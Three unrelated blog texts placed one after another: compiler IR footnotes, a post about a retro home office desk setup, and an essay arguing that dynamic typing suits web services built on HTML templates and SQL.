polynomial time algorithms exist for losslessly converting between them (LLVM compiling Wasm, for example, converts its CFG into SCF using a “relooping algorithm”). In SCF, operations like switch statements and loops are represented as macro operations that contain basic blocks. For example, a operation might take a value as input, select a basic block to execute based on that, and return the value that basic block evaluates to as its output. RVSDG is a notable innovation in this space, because it allows circuit analysis of entire imperative programs. I am convering SSA-CFG instead of SSA-SCF simply because it’s more common, and because it’s what LLVM IR is. See also this MLIR presentation for converting between the two.  ↩ Tail calling is when a function call is the last operation in a function; this allows the caller to jump directly to the callee, recycling its own stack frame for it instead of requiring it to allocate its own.  ↩ Given any path from to , we can make it acyclic by replacing each subpath from to with a single node.  ↩ When moving from a basic block to a pred, a register in that block which is defined as a block parameter corresponds to some register (or immediate) in each predecessor. That is the “equivalent” of . One possible option for the “equivalent” is an immediate: for example, or the address of a global. In the case of a global , assuming no data races, we would instead need alias information to tell if stores to this global within the current function (a) exist and (b) are liftable at all. If the equivalent is , we can proceed in one of two ways depending on optimization level. If we want loads of to trap (as in Go), we need to mark this load as not being liftable, because it may trap. If we want loads of to be UB, we simply ignore that pred, because we can assume (for our analysis) that if the pointer is , it is never loaded from.  ↩ Returned stack pointers do not escape: stack slots’ lifetimes end at function exit, so we return a dangling pointer, which we assume are never loaded. So stores to that pointer before returning it can be discarded.  ↩

0 views
Brain Baking 1 months ago

My (Retro) Desk Setup in 2025

A lot has happened since the desk setup post from March 2024 —that being I got kicked out of my usual cosy home office upstairs as it was being rebranded into our son’s bedroom. We’ve been trying to fit the office space into the rest of the house by exploring different alternatives: clear a corner of our bedroom and shove everything in there, cut on stuff and integrate it into the living room, … None of the options felt particularly appealing to me. I grew attached to the upstairs place and didn’t want to lose the skylight. And then we renovated our home resulting in more shuffling around of room designations: the living room migrated to the new section with high glass windows to better connect with the back garden. That logically meant I could claim the vacant living room space. Which I did: My home office setup since May 2025. Compared to the old setup, quite a few things changed. First, it’s clear that the new space is much more roomy. But that doesn’t automatically mean I’m able to fit more stuff into it. After comparing both setups, you’ll probably wonder where most of my retro hardware went off to: only the 486 made it into the corder on the left. I first experimented with replicating the same setup downstairs resulting in a very long desk shoved under the window containing the PC towers and screens. That worked, as again there’s enough space, but at the same time, it didn’t at all: putting a lot of stuff in front of the window not only blocks the view, it also makes the office feel cramped and cluttered. That is why the desk is now split into two. The WinXP and Win98 machines have been temporarily stashed away in a closet as I still have to find a way to fit the third desk somewhere at the back (not pictured). Currently, a cupboard stray from the old living room is refusing to let go. We have some ideas to better organize the space but at the moment I can’t find the energy to make it happen. I haven’t even properly reconnected the 486 tower. The messy cables on the photo have been neatly tucked away by now, at least that’s something. Next, since I also have more wall space, I moved all board games into a new Kallax in the new space (pictured on the left). There’s still ample space left to welcome new board games which was becoming a big problem in the old shelf in the hallway that now holds the games of the kids. On the opposite side of the wall (not pictured), I’ve mounted the Billy bookcases from upstairs that now bleed into the back wall (pictured on the right). These two components are new: the small one is currently holding Switch games and audio CDs and the one on the far right is still mostly empty except for fountain pen ink on the top shelf. The problem with filling all that wall space is that there’s almost none left to decorate with a piece of art. Fortunately, the Monkey Island posters survived the move, but I was hoping to be able to put up something else. The big window doesn’t help here: the old space’s skylight allowed me to optimize the wall space. The window is both a blessing and a curse. Admittedly, it’s very nice to be able to stare outside in-between the blue screen sessions, especially if it’s spring/summer when everything is bright green. The new space is far from finished. I intend to put a table down there next to the board game shelf so that noisy gaming sessions don’t bother the people in the living room. The retro hardware pieces deserve a permanent spot and I’m bummed out that some of them had to be (hopefully temporality) stowed away. A KVM switch won’t help here as I already optimized the monitor usage (see the setup of previous years ). My wife suggested to throw a TV in there to connect the SNES and GameCube but the books are eating up all the wall space and I don’t want the office to degrade into a cluttered mess. I’m not even sure whether the metre long desk is worth it for just a laptop and a second screen compared to the one I used before. The relax chair how used for nightly baby feeds still needs to find its way back here as well. I imagine that in a year things will look differently yet again. Hopefully, by then, it will feature more retroness . Related topics: / setup / By Wouter Groeneveld on 12 October 2025.  Reply via email .

0 views

What Dynamic Typing Is For

Unplanned Obsolescence is a blog is about writing maintainable, long-lasting software. It also frequently touts—or is, at the very least, not inherently hostile to—writing software in dynamically-typed programming languages. These two positions are somewhat at odds. Dynamically-typed languages encode less information. That’s a problem for the person reading the code and trying to figure out what it does. This is a simplified version of an authentication middleware that I include in most of my web services: it checks an HTTP request to see if it corresponds to a logged-in user’s session. Pretty straightforward stuff. The function gets a cookie from the HTTP request, checks the database to see if that token corresponds to a user, and then returns the user if it does. Line 2 fetches the cookie from the request, line 3 gets the user from the database, and the rest either returns the user or throw an error. There are, however, some problems with this. What happens if there’s no cookie included in the HTTP request? Will it return or an empty string? Will even exist if there’s no cookies at all? There’s no way to know without looking at the implementation (or, less reliably, the documentation). That doesn’t mean there isn’t an answer! A request with no cookie will return . That results in a call, which returns (the function checks for that). is a falsy value in JavaScript, so the conditional evaluates to false and throws an . The code works and it’s very readable, but you have to do a fair amount of digging to ensure that it works reliably. That’s a cost that gets paid in the future, anytime the “missing token” code path needs to be understood or modified. That cost reduces the maintainability of the service. Unsurprisingly, the equivalent Rust code is much more explicit. In Rust, the tooling can answer a lot more questions for me. What type is ? A simple hover in any code editor with an LSP tells me, definitively, that it’s . Because it’s Rust, you have to explicitly check if the token exists; ditto for whether the user exists. That’s better for the reader too: they don’t have to wonder whether certain edge cases are handled. Rust is not the only language with a strict, static typing. At every place I’ve ever worked, the longest-running web services have all been written in Java. Java is not as good as Rust at forcing you to show your work and handle edge cases, but it’s much better than JavaScript. Putting aside the question of which one I prefer to write, if I find myself in charge a production web service that someone else wrote, I would much prefer it to be in Java or Rust than JavaScript or Python. Conceding that, ceteris paribus , static typing is good for software maintainability, one of the reasons that I like dynamically-typed languages is that they encourage a style I find important for web services in particular: writing to the DSL. A DSL (domain-specific language) is programming language that’s designed for a specific problem area. This is in contrast to what we typically call “general-purpose programming languages” (e.g. Java, JavaScript, Python, Rust), which can reasonably applied to most programming tasks. Most web services have to contend with at least three DSLs: HTML, CSS, and SQL. A web service with a JavaScript backend has to interface with, at a minimum , four programming languages: one general-purpose and three DSLs. If you have the audacity to use something other than JavaScript on the server, then that number goes up to five, because you still need JavaScript to augment HTML. That’s a lot of languages! How are we supposed to find developers who can do all this stuff ? The answer that a big chunk of the industry settled on is to build APIs so that the domains of the DSLs can be described in the general-purpose programming language. Instead of writing HTML… …you can write JSX, a JavaScript syntax extension that supports tags. This has the important advantage of allowing you to include dynamic JavaScript expressions in your markup. And now we don’t have to kick out to another DSL to write web pages. Can we start abstracting away CSS too? Sure can! This example uses styled-components . This is a tactic I call “expanding the bounds” of the programming language. In an effort to reduce complexity, you try to make one language express everything about the project. In theory, this reduces the number of languages that one needs to learn to work on it. The problem is that it usually doesn’t work. Expressing DSLs in general-purpose programming syntax does not free you from having to understand the DSL—you can’t actually use styled-components without understanding CSS. So now a prospective developer has to both understand CSS and a new CSS syntax that only applies to the styled-components library. Not to mention, it is almost always a worse syntax. CSS is designed to make expressing declarative styles very easy, because that’s the only thing CSS has to do. Expressing this in JavaScript is naturally way clunkier. Plus, you’ve also tossed the web’s backwards compatibility guarantees. I picked styled-components because it’s very popular. If you built a website with styled-components in 2019 , didn’t think about the styles for a couple years, and then tried to upgrade it in 2023 , you would be two major versions behind. Good luck with the migration guide . CSS files, on the other hand, are evergreen . Of course, one of the reasons for introducing JSX or CSS-in-JS is that they add functionality, like dynamic population of values. That’s an important problem, but I prefer a different solution. Instead of expanding the bounds of the general-purpose language so that it can express everything, another strategy is to build strong and simple API boundaries between the DSLs. Some benefits of this approach include: The following example uses a JavaScript backend. A lot of enthusiasm for htmx (the software library I co-maintain) is driven by communities like Django and Spring Boot developers, who are thrilled to no longer be bolting on a JavaScript frontend to their website; that’s a core value proposition for hypermedia-driven development . I happen to like JavaScript though, and sometimes write services in NodeJS, so, at least in theory, I could still use JSX if I wanted to. What I prefer, and what I encourage hypermedia-curious NodeJS developers to do, is use a template engine . This bit of production code I wrote for an events company uses Nunjucks , a template engine I once (fondly!) called “abandonware” on stage . Other libraries that support Jinja -like syntax are available in pretty much any programming language. This is just HTML with basic loops ( ) and data access ( ). I get very frustrated when something that is easy in HTML is hard to do because I’m using some wrapper with inferior semantics; with templates, I can dynamically build content for HTML without abstracting it away. Populating this template in JavaScript is so easy . You just give it a JavaScript object with an field. That’s not particularly special on its own—many languages support serialized key-value pairs. This strategy really shines when you start stringing it together with SQL. Let’s replace that database function call with an actual query, using an interface similar to . I know the above code is not everybody’s taste, but I think it’s marvelous. You get to write all parts of the application in the language best suited to each: HTML for the frontend and SQL for the queries. And if you need to do any additional logic between the database and the template, JavaScript is still right there. One result of this style is that it increases the percentage of your service that is specified declaratively. The database schema and query are declarative, as is the HTML template. The only imperative code in the function is the glue that moves that query result into the template: two statements in total. Debugging is also dramatically easier. I typically do two quick things to narrow down the location of the bug: Those two steps are easy, can be done in production with no deployments, and provide excellent signal on the location of the error. Fundamentally, what’s happening here is a quick check at the two hard boundaries of the system: the one between the server and the client, and the one between the client and the database. Similar tools are available to you if you abstract over those layers, but they are lessened in usefulness. Every web service has network requests that can be inspected, but putting most frontend logic in the template means that the HTTP response’s data (“does the date ever get send to the frontend”) and functionality (“does the date get displayed in the right HTML element?”) can be inspected in one place, with one keystroke. Every database can be queried, but using the database’s native query language in your server means you can validate both the stored data (“did the value get saved?”) and the query (“does the code ask for the right value?”) independent of the application. By pushing so much of the business logic outside the general-purpose programming language, you reduce the likelihood that a bug will exist in the place where it is hardest to track down—runtime server logic. You’d rather the bug be a malformatted SQL query or HTML template, because those are easy to find and easy to fix. When combined with the router-driven style described in Building The Hundred-Year Web Service , you get simple and debuggable web systems. Each HTTP request is a relatively isolated function call: it takes some parameters, runs an SQL query, and returns some HTML. In essence, dynamically-typed languages help you write the least amount of server code possible, leaning heavily on the DSLs that define web programming while validating small amounts of server code via means other than static type checking. To finish, let’s take a look at the equivalent code in Rust, using rusqlite , minjina , and a quasi-hypothetical server implementation: I am again obfuscating some implementation details (Are we storing human-readable dates in the database? What’s that universal result type?). The important part is that this blows. Most of the complexity comes from the need to tell Rust exactly how to unpack that SQL result into a typed data structure, and then into an HTML template. The struct is declared so that Rust knows to expect a for . The derive macros create a representation that minijinja knows how to serialize. It’s tedious. Worse, after all that work, the compiler still doesn’t do the most useful thing: check whether is the correct type for . If it turns out that can’t be represented as a (maybe it’s a blob ), the query will compile correctly and then fail at runtime. From a safety standpoint, we’re not really in a much better spot than we were with JavaScript: we don’t know if it works until we run the code. Speaking of JavaScript, remember that code? That was great! Now we have no idea what any of these types are, but if we run the code and we see some output, it’s probably fine. By writing the JavaScript version, you are banking that you’ve made the code so highly auditable by hand that the compile-time checks become less necessary. In the long run, this is always a bad bet, but at least I’m not writing 150% more code for 10% more compile-time safety. The “expand the bounds” solution to this is to pull everything into the language’s type system: the database schema, the template engine, everything. Many have trod that path; I believe it leads to madness (and toolchain lock-in). Is there a better one? I believe there is. The compiler should understand the DSLs I’m writing and automatically map them to types it understands. If it needs more information—like a database schema—to figure that out, that information can be provided. Queries correspond to columns with known types—the programming language can infer that is of type . HTML has context-dependent escaping rules —the programming language can validate that is being used in a valid element and escape it correctly. With this functionality in the compiler, if I make a database migration that would render my usage of a dependent variable in my HTML template invalid, the compiler will show an error. All without losing the advantages of writing the expressive, interoperable, and backwards-compatible DSLs the comprise web development. Dynamically-typed languages show us how easy web development can be when we ditch the unnecessary abstractions. Now we need tooling to make it just as easy in statically-typed languages too. Thanks to Meghan Denny for her feedback on a draft of this blog. DSLs are better at expressing their domain, resulting in simpler code It aids debugging by segmenting bugs into natural categories The skills gained by writing DSLs are more more transferable CMD+U to View Source - If the missing data is in the HTML, it’s a frontend problem Run the query in the database - If the missing data is in the SQL, it’s a problem with the GET route Language extensions that just translate the syntax are alright by me, like generating HTML with s-expressions , ocaml functions , or zig comptime functions . I tend to end up just using templates, but language-native HTML syntax can be done tastefully, and they are probably helpful in the road to achieving the DX I’m describing; I’ve never seen them done well for SQL. Sqlx and sqlc seem to have the right idea, but I haven’t used either because I to stick to SQLite-specific libraries to avoid async database calls. I don’t know as much about compilers as I’d like to, so I have no idea what kind of infrastructure would be required to make this work with existing languages in an extensible way. I assume it would be hard.

0 views